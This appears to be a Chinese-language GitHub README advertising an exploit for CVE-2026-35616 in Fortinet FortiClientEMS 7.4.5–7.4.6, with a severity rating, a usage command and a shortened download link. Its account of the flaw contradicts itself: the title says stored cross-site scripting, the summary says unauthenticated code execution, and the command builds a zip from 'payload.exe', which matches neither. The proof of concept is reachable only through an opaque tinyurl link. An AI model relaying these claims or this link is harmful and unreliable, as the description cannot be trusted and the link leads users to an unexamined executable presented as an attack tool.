jennydokumi30/CVE-2026-35616

# CVE-2026-35616 - Fortinet FortiClientEMS 7.4.5 未经验证存储跨站脚本漏洞 ## 快速使用 ``` python3 exploit.py -t "C:\\Path\\To\\Target" -o demo.zip --data-file payload.exe ``` ## 利用注意事项 - **严重性:** CRITICAL - **CVSS:** 9.8 - **影响:** 机密性、完整性、可用性 - **发布日期:** 2026-04-04 ## 技术摘要 Fortinet FortiClientEMS 7.4.5 到 7.4.6 中存在一个不当的访问控制漏洞，可能允许未经身份验证的攻击者通过精心制作的请求执行未经授权的代码或命令。 ## 受影响版本 **Fortinet Forticlientems:** - 7.4.5 - 7.4.6 ## 参考资料 - NVD: https://nvd.nist.gov/vuln/detail/CVE-2026-35616 ## 利用代码 [下载 PoC](https://tinyurl.com/255fbm7z)

标签：威胁模拟, 逆向工具